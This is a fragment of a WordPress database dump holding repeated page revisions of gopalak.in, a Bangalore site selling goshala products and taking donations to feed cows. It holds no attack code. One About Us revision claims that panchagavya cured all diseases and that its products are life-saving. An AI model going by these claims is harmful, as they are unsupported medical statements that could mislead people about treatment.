superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 18:04:59','2022-10-19 12:34:59','',1373,'https://gopalak.in/?p=1888',0,'revision','',0),(1889,1,'2022-10-19 18:11:55','2022-10-19 12:41:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 18:11:55','2022-10-19 12:41:55','',1373,'https://gopalak.in/?p=1889',0,'revision','',0),(1890,1,'2022-10-19 18:11:55','2022-10-19 12:41:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 18:11:55','2022-10-19 12:41:55','',1373,'https://gopalak.in/?p=1890',0,'revision','',0),(1891,1,'2022-10-19 18:11:55','2022-10-19 12:41:55','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 18:11:55','2022-10-19 12:41:55','',1373,'https://gopalak.in/?p=1891',0,'revision','',0),(1892,1,'2022-10-20 09:54:28','2022-10-20 04:24:28','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 09:54:28','2022-10-20 04:24:28','',1804,'https://gopalak.in/?p=1892',0,'revision','',0),(1893,1,'2022-10-20 09:55:11','2022-10-20 04:25:11','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, 